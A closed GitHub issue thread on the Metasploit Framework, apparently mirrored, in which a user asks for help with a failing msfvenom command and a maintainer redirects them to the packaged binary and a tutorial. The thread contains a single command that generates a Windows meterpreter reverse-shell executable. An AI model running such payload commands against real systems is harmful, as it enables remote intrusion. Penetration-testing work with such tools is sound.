rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.79k stars 13.9k forks source link

creating an apk #14038

Closed more8797 closed 4 years ago

more8797 commented 4 years ago

root@malcolmx-HP-ProBook-4540s:/home/malcolm-x# opt/metasploit-framework/bin/../embedded/framework/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.exe bash: "ipadd" No such file or directory

am using ubuntu latest version and encounterd tht error need your help please

busterb commented 4 years ago

Howdy! Please don't call the embedded binaries directly here. They're hidden for a reason, since the wrong ruby and environment. Just use the /usr/bin/msfvenom that the package installs and puts in your path.

I think you'd be helped by maybe following a tutorial first and getting basics before asking for help here: https://resources.infosecinstitute.com/lab-hacking-an-android-device-with-msfvenom/

more8797 commented 4 years ago

Ok thank you On 25 Aug 2020 13:13, "Brent Cook" notifications@github.com wrote:

Howdy! Please don't call the embedded binaries directly here. They're hidden for a reason, since the wrong ruby and everything else will be invoked. Just use /usr/bin/msfvenom that the package installs.

I think you'd be helped by maybe following a tutorial first and getting basics before asking for help here: https://resources.infosecinstitute.com/lab-hacking-an-android-device- with-msfvenom/

— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/14038#issuecomment-679961205, or unsubscribe https://github.com/notifications/unsubscribe-auth/AQWWDBJ3DS7XTBYIEXYVGBTSCOMEDANCNFSM4QINRXUA .